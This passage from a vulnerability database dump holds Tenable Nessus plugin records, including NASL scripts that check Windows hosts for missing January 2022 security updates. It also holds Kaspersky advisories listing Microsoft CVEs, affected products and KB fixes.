system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": 
"2022-04-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009546.NASL", "href": "https://www.tenable.com/plugins/nessus/156619", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156619);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21911\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\",\n \"CVE-2022-21964\"\n );\n script_xref(name:\"MSKB\", value:\"5009546\");\n script_xref(name:\"MSFT\", 
value:\"MS22-5009546\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009546\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009546.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft 
Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009546');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009546])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:37", "description": "The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
"CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009543.NASL", "href": "https://www.tenable.com/plugins/nessus/156617", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156617);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n 
\"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009543\");\n script_xref(name:\"MSFT\", value:\"MS22-5009543\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009543.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009543');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:58:15", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). 
Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 
Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005090](<http://support.microsoft.com/kb/5005090>) \n[5005089](<http://support.microsoft.com/kb/5005089>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005095](<http://support.microsoft.com/kb/5005095>) \n[5005088](<http://support.microsoft.com/kb/5005088>) \n[5011525](<http://support.microsoft.com/kb/5011525>) \n[5011534](<http://support.microsoft.com/kb/5011534>) \n[5011552](<http://support.microsoft.com/kb/5011552>) 
\n[5011529](<http://support.microsoft.com/kb/5011529>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12250 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-03-09T00:00:00", "id": "KLA12250", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12250/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems 
Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) 